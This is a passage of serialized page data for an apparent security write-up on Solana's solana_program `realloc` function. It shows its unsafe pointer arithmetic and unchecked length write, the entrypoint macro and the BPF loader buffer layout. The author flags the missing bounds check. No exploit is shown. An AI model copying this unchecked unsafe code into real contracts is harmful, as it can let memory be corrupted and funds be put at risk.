",{"type":28,"tag":116,"props":13711,"children":13712},{"style":376},[13713],{"type":33,"value":8513},{"type":28,"tag":116,"props":13715,"children":13716},{"style":370},[13717],{"type":33,"value":9484},{"type":28,"tag":116,"props":13719,"children":13720},{"style":376},[13721],{"type":33,"value":9323},{"type":28,"tag":116,"props":13723,"children":13724},{"style":339},[13725],{"type":33,"value":5531},{"type":28,"tag":116,"props":13727,"children":13728},{"style":266},[13729],{"type":33,"value":1829},{"type":28,"tag":116,"props":13731,"children":13732},{"style":370},[13733],{"type":33,"value":141},{"type":28,"tag":116,"props":13735,"children":13736},{"style":282},[13737],{"type":33,"value":13567},{"type":28,"tag":116,"props":13739,"children":13740},{"style":266},[13741],{"type":33,"value":313},{"type":28,"tag":116,"props":13743,"children":13744},{"style":350},[13745],{"type":33,"value":1824},{"type":28,"tag":116,"props":13747,"children":13748},{"style":266},[13749],{"type":33,"value":1609},{"type":28,"tag":116,"props":13751,"children":13752},{"style":376},[13753],{"type":33,"value":8513},{"type":28,"tag":116,"props":13755,"children":13756},{"style":339},[13757],{"type":33,"value":5531},{"type":28,"tag":116,"props":13759,"children":13760},{"style":266},[13761],{"type":33,"value":1609},{"type":28,"tag":116,"props":13763,"children":13764},{"style":376},[13765],{"type":33,"value":8513},{"type":28,"tag":116,"props":13767,"children":13768},{"style":370},[13769],{"type":33,"value":9484},{"type":28,"tag":116,"props":13771,"children":13772},{"style":376},[13773],{"type":33,"value":3394},{"type":28,"tag":116,"props":13775,"children":13776},{"style":339},[13777],{"type":33,"value":5531},{"type":28,"tag":116,"props":13779,"children":13780},{"style":266},[13781],{"type":33,"value":895},{"type":28,"tag":116,"props":13783,"children":13784},{"class":245,"line":779},[13785,13789,13793,13797,13801,13805,13809],{"type":28,"tag":116,"props":13786,"children":13787},{"style":370},[13788],{"type":33,"value":7423},{"type":28,"tag":116,"props":13790,"children":13791},{"style":272},[13792],{"type":33,"value":13615},{"type":28,"tag":116,"props":13794,"children":13795},{"style":370},[13796],{"type":33,"value":2226},{"type":28,"tag":116,"props":13798,"children":13799},{"style":272},[13800],{"type":33,"value":13624},{"type":28,"tag":116,"props":13802,"children":13803},{"style":376},[13804],{"type":33,"value":8500},{"type":28,"tag":116,"props":13806,"children":13807},{"style":339},[13808],{"type":33,"value":5531},{"type":28,"tag":116,"props":13810,"children":13811},{"style":266},[13812],{"type":33,"value":384},{"type":28,"tag":116,"props":13814,"children":13815},{"class":245,"line":796},[13816],{"type":28,"tag":116,"props":13817,"children":13818},{"style":266},[13819],{"type":33,"value":3025},{"type":28,"tag":116,"props":13821,"children":13822},{"class":245,"line":847},[13823],{"type":28,"tag":116,"props":13824,"children":13825},{"emptyLinePlaceholder":19},[13826],{"type":33,"value":1044},{"type":28,"tag":116,"props":13828,"children":13829},{"class":245,"line":898},[13830],{"type":28,"tag":116,"props":13831,"children":13832},{"style":250},[13833],{"type":33,"value":13834},"    // zero-init if requested\n",{"type":28,"tag":116,"props":13836,"children":13837},{"class":245,"line":907},[13838,13842,13847,13852,13856,13861,13865],{"type":28,"tag":116,"props":13839,"children":13840},{"style":260},[13841],{"type":33,"value":11947},{"type":28,"tag":116,"props":13843,"children":13844},{"style":272},[13845],{"type":33,"value":13846}," zero_init",{"type":28,"tag":116,"props":13848,"children":13849},{"style":370},[13850],{"type":33,"value":13851}," &&",{"type":28,"tag":116,"props":13853,"children":13854},{"style":272},[13855],{"type":33,"value":13624},{"type":28,"tag":116,"props":13857,"children":13858},{"style":370},[13859],{"type":33,"value":13860}," >",{"type":28,"tag":116,"props":13862,"children":13863},{"style":272},[13864],{"type":33,"value":13454},{"type":28,"tag":116,"props":13866,"children":13867},{"style":266},[13868],{"type":33,"value":1291},{"type":28,"tag":116,"props":13870,"children":13871},{"class":245,"line":981},[13872,13877],{"type":28,"tag":116,"props":13873,"children":13874},{"style":282},[13875],{"type":33,"value":13876},"        sol_memset",{"type":28,"tag":116,"props":13878,"children":13879},{"style":266},[13880],{"type":33,"value":3133},{"type":28,"tag":116,"props":13882,"children":13883},{"class":245,"line":1011},[13884,13888,13892,13896,13900,13904,13908,13912,13916,13921,13925],{"type":28,"tag":116,"props":13885,"children":13886},{"style":370},[13887],{"type":33,"value":7356},{"type":28,"tag":116,"props":13889,"children":13890},{"style":376},[13891],{"type":33,"value":3394},{"type":28,"tag":116,"props":13893,"children":13894},{"style":376},[13895],{"type":33,"value":13463},{"type":28,"tag":116,"props":13897,"children":13898},{"style":370},[13899],{"type":33,"value":141},{"type":28,"tag":116,"props":13901,"children":13902},{"style":282},[13903],{"type":33,"value":13540},{"type":28,"tag":116,"props":13905,"children":13906},{"style":266},[13907],{"type":33,"value":13545},{"type":28,"tag":116,"props":13909,"children":13910},{"style":370},[13911],{"type":33,"value":2825},{"type":28,"tag":116,"props":13913,"children":13914},{"style":266},[13915],{"type":33,"value":347},{"type":28,"tag":116,"props":13917,"children":13918},{"style":272},[13919],{"type":33,"value":13920},"orig_len",{"type":28,"tag":116,"props":13922,"children":13923},{"style":370},[13924],{"type":33,"value":2723},{"type":28,"tag":116,"props":13926,"children":13927},{"style":266},[13928],{"type":33,"value":13929},"],\n",{"type":28,"tag":116,"props":13931,"children":13932},{"class":245,"line":1029},[13933,13938],{"type":28,"tag":116,"props":13934,"children":13935},{"style":350},[13936],{"type":33,"value":13937},"            0",{"type":28,"tag":116,"props":13939,"children":13940},{"style":266},[13941],{"type":33,"value":3178},{"type":28,"tag":116,"props":13943,"children":13944},{"class":245,"line":1038},[13945,13950,13954,13959,13963,13967],{"type":28,"tag":116,"props":13946,"children":13947},{"style":272},[13948],{"type":33,"value":13949},"            new_len",{"type":28,"tag":116,"props":13951,"children":13952},{"style":370},[13953],{"type":33,"value":141},{"type":28,"tag":116,"props":13955,"children":13956},{"style":282},[13957],{"type":33,"value":13958},"saturating_sub",{"type":28,"tag":116,"props":13960,"children":13961},{"style":266},[13962],{"type":33,"value":313},{"type":28,"tag":116,"props":13964,"children":13965},{"style":272},[13966],{"type":33,"value":13920},{"type":28,"tag":116,"props":13968,"children":13969},{"style":266},[13970],{"type":33,"value":6408},{"type":28,"tag":116,"props":13972,"children":13973},{"class":245,"line":1047},[13974],{"type":28,"tag":116,"props":13975,"children":13976},{"style":266},[13977],{"type":33,"value":7415},{"type":28,"tag":116,"props":13979,"children":13980},{"class":245,"line":1071},[13981],{"type":28,"tag":116,"props":13982,"children":13983},{"style":266},[13984],{"type":33,"value":3025},{"type":28,"tag":116,"props":13986,"children":13987},{"class":245,"line":1137},[13988],{"type":28,"tag":116,"props":13989,"children":13990},{"emptyLinePlaceholder":19},[13991],{"type":33,"value":1044},{"type":28,"tag":116,"props":13993,"children":13994},{"class":245,"line":1181},[13995,14000],{"type":28,"tag":116,"props":13996,"children":13997},{"style":339},[13998],{"type":33,"value":13999},"    Ok",{"type":28,"tag":116,"props":14001,"children":14002},{"style":266},[14003],{"type":33,"value":14004},"(())\n",{"type":28,"tag":116,"props":14006,"children":14007},{"class":245,"line":1212},[14008],{"type":28,"tag":116,"props":14009,"children":14010},{"style":266},[14011],{"type":33,"value":406},{"type":28,"tag":29,"props":14013,"children":14014},{},[14015,14017,14023,14025,14030],{"type":33,"value":14016},"Oh. There's ",{"type":28,"tag":98,"props":14018,"children":14020},{"className":14019},[],[14021],{"type":33,"value":14022},"unsafe",{"type":33,"value":14024},". And no bounds check in sight. ",{"type":28,"tag":2583,"props":14026,"children":14027},{},[14028],{"type":33,"value":14029},"And",{"type":33,"value":14031}," pointer math. That doesn't look promising...",{"type":28,"tag":63,"props":14033,"children":14035},{"id":14034},"breaking-down-realloc",[14036,14038],{"type":33,"value":14037},"Breaking down ",{"type":28,"tag":98,"props":14039,"children":14041},{"className":14040},[],[14042],{"type":33,"value":13304},{"type":28,"tag":29,"props":14044,"children":14045},{},[14046,14048,14053],{"type":33,"value":14047},"Let's pick apart this ",{"type":28,"tag":98,"props":14049,"children":14051},{"className":14050},[],[14052],{"type":33,"value":14022},{"type":33,"value":14054}," block, since there's a lot going on here.",{"type":28,"tag":234,"props":14056,"children":14058},{"className":2652,"code":14057,"language":2651,"meta":7,"style":7},"// First set new length in the serialized data\nlet ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n*ptr = new_len as u64;\n",[14059],{"type":28,"tag":98,"props":14060,"children":14061},{"__ignoreMap":7},[14062,14070,14157],{"type":28,"tag":116,"props":14063,"children":14064},{"class":245,"line":246},[14065],{"type":28,"tag":116,"props":14066,"children":14067},{"style":250},[14068],{"type":33,"value":14069},"// First set new length in the serialized data\n",{"type":28,"tag":116,"props":14071,"children":14072},{"class":245,"line":256},[14073,14077,14081,14085,14089,14093,14097,14101,14105,14109,14113,14117,14121,14125,14129,14133,14137,14141,14145,14149,14153],{"type":28,"tag":116,"props":14074,"children":14075},{"style":376},[14076],{"type":33,"value":11455},{"type":28,"tag":116,"props":14078,"children":14079},{"style":272},[14080],{"type":33,"value":13523},{"type":28,"tag":116,"props":14082,"children":14083},{"style":370},[14084],{"type":33,"value":2226},{"type":28,"tag":116,"props":14086,"children":14087},{"style":376},[14088],{"type":33,"value":13463},{"type":28,"tag":116,"props":14090,"children":14091},{"style":370},[14092],{"type":33,"value":141},{"type":28,"tag":116,"props":14094,"children":14095},{"style":282},[14096],{"type":33,"value":13540},{"type":28,"tag":116,"props":14098,"children":14099},{"style":266},[14100],{"type":33,"value":13545},{"type":28,"tag":116,"props":14102,"children":14103},{"style":370},[14104],{"type":33,"value":2803},{"type":28,"tag":116,"props":14106,"children":14107},{"style":282},[14108],{"type":33,"value":13554},{"type":28,"tag":116,"props":14110,"children":14111},{"style":266},[14112],{"type":33,"value":13545},{"type":28,"tag":116,"props":14114,"children":14115},{"style":370},[14116],{"type":33,"value":141},{"type":28,"tag":116,"props":14118,"children":14119},{"style":282},[14120],{"type":33,"value":13567},{"type":28,"tag":116,"props":14122,"children":14123},{"style":266},[14124],{"type":33,"value":313},{"type":28,"tag":116,"props":14126,"children":14127},{"style":370},[14128],{"type":33,"value":3996},{"type":28,"tag":116,"props":14130,"children":14131},{"style":350},[14132],{"type":33,"value":3745},{"type":28,"tag":116,"props":14134,"children":14135},{"style":266},[14136],{"type":33,"value":1609},{"type":28,"tag":116,"props":14138,"children":14139},{"style":376},[14140],{"type":33,"value":8513},{"type":28,"tag":116,"props":14142,"children":14143},{"style":370},[14144],{"type":33,"value":9484},{"type":28,"tag":116,"props":14146,"children":14147},{"style":376},[14148],{"type":33,"value":3394},{"type":28,"tag":116,"props":14150,"children":14151},{"style":339},[14152],{"type":33,"value":5531},{"type":28,"tag":116,"props":14154,"children":14155},{"style":266},[14156],{"type":33,"value":384},{"type":28,"tag":116,"props":14158,"children":14159},{"class":245,"line":293},[14160,14164,14168,14172,14176,14180,14184],{"type":28,"tag":116,"props":14161,"children":14162},{"style":370},[14163],{"type":33,"value":4240},{"type":28,"tag":116,"props":14165,"children":14166},{"style":272},[14167],{"type":33,"value":13615},{"type":28,"tag":116,"props":14169,"children":14170},{"style":370},[14171],{"type":33,"value":2226},{"type":28,"tag":116,"props":14173,"children":14174},{"style":272},[14175],{"type":33,"value":13624},{"type":28,"tag":116,"props":14177,"children":14178},{"style":376},[14179],{"type":33,"value":8500},{"type":28,"tag":116,"props":14181,"children":14182},{"style":339},[14183],{"type":33,"value":5531},{"type":28,"tag":116,"props":14185,"children":14186},{"style":266},[14187],{"type":33,"value":384},{"type":28,"tag":29,"props":14189,"children":14190},{},[14191,14196],{"type":28,"tag":98,"props":14192,"children":14194},{"className":14193},[],[14195],{"type":33,"value":13540},{"type":33,"value":14197}," returns a mutable reference to the underlying buffer holding the data of the account. Normally in the course of contract execution, this comes from the serialized buffer passed into the contract by the BPF loader. So before we can understand the details here, let's take a quick detour...",{"type":28,"tag":75,"props":14199,"children":14201},{"id":14200},"bpf-loader-abi",[14202],{"type":33,"value":14203},"BPF Loader ABI",{"type":28,"tag":29,"props":14205,"children":14206},{},[14207,14209,14214,14216,14229],{"type":33,"value":14208},"Solana smart contracts have one job: interact with on-chain accounts. So what's the interface between the contract and the rest of the chain? To answer that, we're going to take a look at ",{"type":28,"tag":98,"props":14210,"children":14212},{"className":14211},[],[14213],{"type":33,"value":13319},{"type":33,"value":14215},"'s entrypoint code - the code that's added when you use the ",{"type":28,"tag":87,"props":14217,"children":14220},{"href":14218,"rel":14219},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#116-131",[91],[14221,14227],{"type":28,"tag":98,"props":14222,"children":14224},{"className":14223},[],[14225],{"type":33,"value":14226},"entrypoint!",{"type":33,"value":14228}," macro",{"type":33,"value":4160},{"type":28,"tag":234,"props":14231,"children":14233},{"className":2652,"code":14232,"language":2651,"meta":7,"style":7},"#[no_mangle]\npub unsafe extern \"C\" fn entrypoint(input: *mut u8) -> u64 {\n    let (program_id, accounts, instruction_data) =\n        unsafe { $crate::entrypoint::deserialize(input) };\n    match $process_instruction(&program_id, &accounts, &instruction_data) {\n        Ok(()) => $crate::entrypoint::SUCCESS,\n        Err(error) => error.into(),\n    }\n}\n",[14234],{"type":28,"tag":98,"props":14235,"children":14236},{"__ignoreMap":7},[14237,14245,14317,14360,14412,14470,14512,14554,14561],{"type":28,"tag":116,"props":14238,"children":14239},{"class":245,"line":246},[14240],{"type":28,"tag":116,"props":14241,"children":14242},{"style":266},[14243],{"type":33,"value":14244},"#[no_mangle]\n",{"type":28,"tag":116,"props":14246,"children":14247},{"class":245,"line":256},[14248,14252,14257,14262,14267,14271,14276,14280,14284,14288,14292,14296,14301,14305,14309,14313],{"type":28,"tag":116,"props":14249,"children":14250},{"style":376},[14251],{"type":33,"value":13356},{"type":28,"tag":116,"props":14253,"children":14254},{"style":376},[14255],{"type":33,"value":14256}," unsafe",{"type":28,"tag":116,"props":14258,"children":14259},{"style":376},[14260],{"type":33,"value":14261}," extern",{"type":28,"tag":116,"props":14263,"children":14264},{"style":563},[14265],{"type":33,"value":14266}," \"C\"",{"type":28,"tag":116,"props":14268,"children":14269},{"style":376},[14270],{"type":33,"value":13361},{"type":28,"tag":116,"props":14272,"children":14273},{"style":282},[14274],{"type":33,"value":14275}," entrypoint",{"type":28,"tag":116,"props":14277,"children":14278},{"style":266},[14279],{"type":33,"value":313},{"type":28,"tag":116,"props":14281,"children":14282},{"style":272},[14283],{"type":33,"value":8039},{"type":28,"tag":116,"props":14285,"children":14286},{"style":370},[14287],{"type":33,"value":4160},{"type":28,"tag":116,"props":14289,"children":14290},{"style":370},[14291],{"type":33,"value":9484},{"type":28,"tag":116,"props":14293,"children":14294},{"style":376},[14295],{"type":33,"value":3394},{"type":28,"tag":116,"props":14297,"children":14298},{"style":339},[14299],{"type":33,"value":14300}," u8",{"type":28,"tag":116,"props":14302,"children":14303},{"style":266},[14304],{"type":33,"value":1609},{"type":28,"tag":116,"props":14306,"children":14307},{"style":370},[14308],{"type":33,"value":13423},{"type":28,"tag":116,"props":14310,"children":14311},{"style":339},[14312],{"type":33,"value":5531},{"type":28,"tag":116,"props":14314,"children":14315},{"style":266},[14316],{"type":33,"value":1291},{"type":28,"tag":116,"props":14318,"children":14319},{"class":245,"line":293},[14320,14324,14328,14333,14337,14342,14346,14351,14355],{"type":28,"tag":116,"props":14321,"children":14322},{"style":376},[14323],{"type":33,"value":2672},{"type":28,"tag":116,"props":14325,"children":14326},{"style":266},[14327],{"type":33,"value":269},{"type":28,"tag":116,"props":14329,"children":14330},{"style":272},[14331],{"type":33,"value":14332},"program_id",{"type":28,"tag":116,"props":14334,"children":14335},{"style":266},[14336],{"type":33,"value":825},{"type":28,"tag":116,"props":14338,"children":14339},{"style":272},[14340],{"type":33,"value":14341},"accounts",{"type":28,"tag":116,"props":14343,"children":14344},{"style":266},[14345],{"type":33,"value":825},{"type":28,"tag":116,"props":14347,"children":14348},{"style":272},[14349],{"type":33,"value":14350},"instruction_data",{"type":28,"tag":116,"props":14352,"children":14353},{"style":266},[14354],{"type":33,"value":1609},{"type":28,"tag":116,"props":14356,"children":14357},{"style":370},[14358],{"type":33,"value":14359},"=\n",{"type":28,"tag":116,"props":14361,"children":14362},{"class":245,"line":361},[14363,14368,14372,14376,14381,14385,14390,14394,14399,14403,14407],{"type":28,"tag":116,"props":14364,"children":14365},{"style":376},[14366],{"type":33,"value":14367},"        unsafe",{"type":28,"tag":116,"props":14369,"children":14370},{"style":266},[14371],{"type":33,"value":9254},{"type":28,"tag":116,"props":14373,"children":14374},{"style":370},[14375],{"type":33,"value":9956},{"type":28,"tag":116,"props":14377,"children":14378},{"style":376},[14379],{"type":33,"value":14380},"crate",{"type":28,"tag":116,"props":14382,"children":14383},{"style":370},[14384],{"type":33,"value":3151},{"type":28,"tag":116,"props":14386,"children":14387},{"style":266},[14388],{"type":33,"value":14389},"entrypoint",{"type":28,"tag":116,"props":14391,"children":14392},{"style":370},[14393],{"type":33,"value":3151},{"type":28,"tag":116,"props":14395,"children":14396},{"style":282},[14397],{"type":33,"value":14398},"deserialize",{"type":28,"tag":116,"props":14400,"children":14401},{"style":266},[14402],{"type":33,"value":313},{"type":28,"tag":116,"props":14404,"children":14405},{"style":272},[14406],{"type":33,"value":8039},{"type":28,"tag":116,"props":14408,"children":14409},{"style":266},[14410],{"type":33,"value":14411},") };\n",{"type":28,"tag":116,"props":14413,"children":14414},{"class":245,"line":387},[14415,14420,14425,14430,14434,14438,14442,14446,14450,14454,14458,14462,14466],{"type":28,"tag":116,"props":14416,"children":14417},{"style":260},[14418],{"type":33,"value":14419},"    match",{"type":28,"tag":116,"props":14421,"children":14422},{"style":370},[14423],{"type":33,"value":14424}," $",{"type":28,"tag":116,"props":14426,"children":14427},{"style":272},[14428],{"type":33,"value":14429},"process_instruction",{"type":28,"tag":116,"props":14431,"children":14432},{"style":266},[14433],{"type":33,"value":313},{"type":28,"tag":116,"props":14435,"children":14436},{"style":370},[14437],{"type":33,"value":2780},{"type":28,"tag":116,"props":14439,"children":14440},{"style":272},[14441],{"type":33,"value":14332},{"type":28,"tag":116,"props":14443,"children":14444},{"style":266},[14445],{"type":33,"value":825},{"type":28,"tag":116,"props":14447,"children":14448},{"style":370},[14449],{"type":33,"value":2780},{"type":28,"tag":116,"props":14451,"children":14452},{"style":272},[14453],{"type":33,"value":14341},{"type":28,"tag":116,"props":14455,"children":14456},{"style":266},[14457],{"type":33,"value":825},{"type":28,"tag":116,"props":14459,"children":14460},{"style":370},[14461],{"type":33,"value":2780},{"type":28,"tag":116,"props":14463,"children":14464},{"style":272},[14465],{"type":33,"value":14350},{"type":28,"tag":116,"props":14467,"children":14468},{"style":266},[14469],{"type":33,"value":844},{"type":28,"tag":116,"props":14471,"children":14472},{"class":245,"line":400},[14473,14478,14483,14487,14491,14495,14499,14503,14507],{"type":28,"tag":116,"props":14474,"children":14475},{"style":339},[14476],{"type":33,"value":14477},"        Ok",{"type":28,"tag":116,"props":14479,"children":14480},{"style":266},[14481],{"type":33,"value":14482},"(()) ",{"type":28,"tag":116,"props":14484,"children":14485},{"style":370},[14486],{"type":33,"value":1286},{"type":28,"tag":116,"props":14488,"children":14489},{"style":370},[14490],{"type":33,"value":14424},{"type":28,"tag":116,"props":14492,"children":14493},{"style":376},[14494],{"type":33,"value":14380},{"type":28,"tag":116,"props":14496,"children":14497},{"style":370},[14498],{"type":33,"value":3151},{"type":28,"tag":116,"props":14500,"children":14501},{"style":266},[14502],{"type":33,"value":14389},{"type":28,"tag":116,"props":14504,"children":14505},{"style":370},[14506],{"type":33,"value":3151},{"type":28,"tag":116,"props":14508,"children":14509},{"style":266},[14510],{"type":33,"value":14511},"SUCCESS,\n",{"type":28,"tag":116,"props":14513,"children":14514},{"class":245,"line":614},[14515,14520,14524,14528,14532,14536,14541,14545,14550],{"type":28,"tag":116,"props":14516,"children":14517},{"style":339},[14518],{"type":33,"value":14519},"        Err",{"type":28,"tag":116,"props":14521,"children":14522},{"style":266},[14523],{"type":33,"value":313},{"type":28,"tag":116,"props":14525,"children":14526},{"style":272},[14527],{"type":33,"value":974},{"type":28,"tag":116,"props":14529,"children":14530},{"style":266},[14531],{"type":33,"value":1609},{"type":28,"tag":116,"props":14533,"children":14534},{"style":370},[14535],{"type":33,"value":1286},{"type":28,"tag":116,"props":14537,"children":14538},{"style":272},[14539],{"type":33,"value":14540}," error",{"type":28,"tag":116,"props":14542,"children":14543},{"style":370},[14544],{"type":33,"value":141},{"type":28,"tag":116,"props":14546,"children":14547},{"style":282},[14548],{"type":33,"value":14549},"into",{"type":28,"tag":116,"props":14551,"children":14552},{"style":266},[14553],{"type":33,"value":3161},{"type":28,"tag":116,"props":14555,"children":14556},{"class":245,"line":631},[14557],{"type":28,"tag":116,"props":14558,"children":14559},{"style":266},[14560],{"type":33,"value":3025},{"type":28,"tag":116,"props":14562,"children":14563},{"class":245,"line":665},[14564],{"type":28,"tag":116,"props":14565,"children":14566},{"style":266},[14567],{"type":33,"value":406},{"type":28,"tag":29,"props":14569,"children":14570},{},[14571,14573,14578,14580,14586,14588,14595,14597,14603,14605,14612],{"type":33,"value":14572},"What we see here is the contract's real entrypoint - it takes a ",{"type":28,"tag":98,"props":14574,"children":14576},{"className":14575},[],[14577],{"type":33,"value":3091},{"type":33,"value":14579}," buffer in from the loader, and calls ",{"type":28,"tag":98,"props":14581,"children":14583},{"className":14582},[],[14584],{"type":33,"value":14585},"solana_program::entrypoint::deserialize",{"type":33,"value":14587},", which then ",{"type":28,"tag":87,"props":14589,"children":14592},{"href":14590,"rel":14591},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#281-337",[91],[14593],{"type":33,"value":14594},"parses out",{"type":33,"value":14596}," all the ",{"type":28,"tag":98,"props":14598,"children":14600},{"className":14599},[],[14601],{"type":33,"value":14602},"AccountInfo",{"type":33,"value":14604},"s, instruction data, and the current running program ID. We can see how the data buffer is ",{"type":28,"tag":87,"props":14606,"children":14609},{"href":14607,"rel":14608},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#308-316",[91],[14610],{"type":33,"value":14611},"laid out",{"type":33,"value":4160},{"type":28,"tag":234,"props":14614,"children":14616},{"className":2652,"code":14615,"language":2651,"meta":7,"style":7},"#[allow(clippy::cast_ptr_alignment)]\nlet data_len = *(input.add(offset) as *const u64) as usize;\noffset += size_of::\u003Cu64>();\n\nlet data = Rc::new(RefCell::new({\n    from_raw_parts_mut(input.add(offset), data_len)\n}));\noffset += data_len + MAX_PERMITTED_DATA_INCREASE;\noffset += (offset as *const u8).align_offset(BPF_ALIGN_OF_U128); // padding\n",[14617],{"type":28,"tag":98,"props":14618,"children":14619},{"__ignoreMap":7},[14620,14637,14717,14750,14757,14804,14849,14857,14881],{"type":28,"tag":116,"props":14621,"children":14622},{"class":245,"line":246},[14623,14628,14632],{"type":28,"tag":116,"props":14624,"children":14625},{"style":266},[14626],{"type":33,"value":14627},"#[allow(clippy",{"type":28,"tag":116,"props":14629,"children":14630},{"style":370},[14631],{"type":33,"value":3151},{"type":28,"tag":116,"props":14633,"children":14634},{"style":266},[14635],{"type":33,"value":14636},"cast_ptr_alignment)]\n",{"type":28,"tag":116,"props":14638,"children":14639},{"class":245,"line":256},[14640,14644,14649,14653,14657,14661,14665,14669,14673,14677,14681,14685,14689,14693,14697,14701,14705,14709,14713],{"type":28,"tag":116,"props":14641,"children":14642},{"style":376},[14643],{"type":33,"value":11455},{"type":28,"tag":116,"props":14645,"children":14646},{"style":272},[14647],{"type":33,"value":14648}," data_len",{"type":28,"tag":116,"props":14650,"children":14651},{"style":370},[14652],{"type":33,"value":2226},{"type":28,"tag":116,"props":14654,"children":14655},{"style":370},[14656],{"type":33,"value":9484},{"type":28,"tag":116,"props":14658,"children":14659},{"style":266},[14660],{"type":33,"value":313},{"type":28,"tag":116,"props":14662,"children":14663},{"style":272},[14664],{"type":33,"value":8039},{"type":28,"tag":116,"props":14666,"children":14667},{"style":370},[14668],{"type":33,"value":141},{"type":28,"tag":116,"props":14670,"children":14671},{"style":282},[14672],{"type":33,"value":9306},{"type":28,"tag":116,"props":14674,"children":14675},{"style":266},[14676],{"type":33,"value":313},{"type":28,"tag":116,"props":14678,"children":14679},{"style":272},[14680],{"type":33,"value":13567},{"type":28,"tag":116,"props":14682,"children":14683},{"style":266},[14684],{"type":33,"value":1609},{"type":28,"tag":116,"props":14686,"children":14687},{"style":376},[14688],{"type":33,"value":8513},{"type":28,"tag":116,"props":14690,"children":14691},{"style":370},[14692],{"type":33,"value":9484},{"type":28,"tag":116,"props":14694,"children":14695},{"style":376},[14696],{"type":33,"value":9323},{"type":28,"tag":116,"props":14698,"children":14699},{"style":339},[14700],{"type":33,"value":5531},{"type":28,"tag":116,"props":14702,"children":14703},{"style":266},[14704],{"type":33,"value":1609},{"type":28,"tag":116,"props":14706,"children":14707},{"style":376},[14708],{"type":33,"value":8513},{"type":28,"tag":116,"props":14710,"children":14711},{"style":339},[14712],{"type":33,"value":13397},{"type":28,"tag":116,"props":14714,"children":14715},{"style":266},[14716],{"type":33,"value":384},{"type":28,"tag":116,"props":14718,"children":14719},{"class":245,"line":293},[14720,14724,14729,14734,14738,14742,14746],{"type":28,"tag":116,"props":14721,"children":14722},{"style":272},[14723],{"type":33,"value":13567},{"type":28,"tag":116,"props":14725,"children":14726},{"style":370},[14727],{"type":33,"value":14728}," +=",{"type":28,"tag":116,"props":14730,"children":14731},{"style":282},[14732],{"type":33,"value":14733}," size_of",{"type":28,"tag":116,"props":14735,"children":14736},{"style":370},[14737],{"type":33,"value":3151},{"type":28,"tag":116,"props":14739,"children":14740},{"style":266},[14741],{"type":33,"value":514},{"type":28,"tag":116,"props":14743,"children":14744},{"style":339},[14745],{"type":33,"value":7714},{"type":28,"tag":116,"props":14747,"children":14748},{"style":266},[14749],{"type":33,"value":8124},{"type":28,"tag":116,"props":14751,"children":14752},{"class":245,"line":361},[14753],{"type":28,"tag":116,"props":14754,"children":14755},{"emptyLinePlaceholder":19},[14756],{"type":33,"value":1044},{"type":28,"tag":116,"props":14758,"children":14759},{"class":245,"line":387},[14760,14764,14769,14773,14778,14782,14786,14791,14795,14799],{"type":28,"tag":116,"props":14761,"children":14762},{"style":376},[14763],{"type":33,"value":11455},{"type":28,"tag":116,"props":14765,"children":14766},{"style":272},[14767],{"type":33,"value":14768}," data",{"type":28,"tag":116,"props":14770,"children":14771},{"style":370},[14772],{"type":33,"value":2226},{"type":28,"tag":116,"props":14774,"children":14775},{"style":339},[14776],{"type":33,"value":14777}," Rc",{"type":28,"tag":116,"props":14779,"children":14780},{"style":370},[14781],{"type":33,"value":3151},{"type":28,"tag":116,"props":14783,"children":14784},{"style":282},[14785],{"type":33,"value":336},{"type":28,"tag":116,"props":14787,"children":14788},{"style":266},[14789],{"type":33,"value":14790},"(RefCell",{"type":28,"tag":116,"props":14792,"children":14793},{"style":370},[14794],{"type":33,"value":3151},{"type":28,"tag":116,"props":14796,"children":14797},{"style":282},[14798],{"type":33,"value":336},{"type":28,"tag":116,"props":14800,"children":14801},{"style":266},[14802],{"type":33,"value":14803},"({\n",{"type":28,"tag":116,"props":14805,"children":14806},{"class":245,"line":400},[14807,14812,14816,14820,14824,14828,14832,14836,14841,14845],{"type":28,"tag":116,"props":14808,"children":14809},{"style":282},[14810],{"type":33,"value":14811},"    from_raw_parts_mut",{"type":28,"tag":116,"props":14813,"children":14814},{"style":266},[14815],{"type":33,"value":313},{"type":28,"tag":116,"props":14817,"children":14818},{"style":272},[14819],{"type":33,"value":8039},{"type":28,"tag":116,"props":14821,"children":14822},{"style":370},[14823],{"type":33,"value":141},{"type":28,"tag":116,"props":14825,"children":14826},{"style":282},[14827],{"type":33,"value":9306},{"type":28,"tag":116,"props":14829,"children":14830},{"style":266},[14831],{"type":33,"value":313},{"type":28,"tag":116,"props":14833,"children":14834},{"style":272},[14835],{"type":33,"value":13567},{"type":28,"tag":116,"props":14837,"children":14838},{"style":266},[14839],{"type":33,"value":14840},"), ",{"type":28,"tag":116,"props":14842,"children":14843},{"style":272},[14844],{"type":33,"value":13472},{"type":28,"tag":116,"props":14846,"children":14847},{"style":266},[14848],{"type":33,"value":2830},{"type":28,"tag":116,"props":14850,"children":14851},{"class":245,"line":614},[14852],{"type":28,"tag":116,"props":14853,"children":14854},{"style":266},[14855],{"type":33,"value":14856},"}));\n",{"type":28,"tag":116,"props":14858,"children":14859},{"class":245,"line":631},[14860,14864,14868,14872,14876],{"type":28,"tag":116,"props":14861,"children":14862},{"style":272},[14863],{"type":33,"value":13567},{"type":28,"tag":116,"props":14865,"children":14866},{"style":370},[14867],{"type":33,"value":14728},{"type":28,"tag":116,"props":14869,"children":14870},{"style":272},[14871],{"type":33,"value":14648},{"type":28,"tag":116,"props":14873,"children":14874},{"style":370},[14875],{"type":33,"value":2258},{"type":28,"tag":116,"props":14877,"children":14878},{"style":266},[14879],{"type":33,"value":14880}," 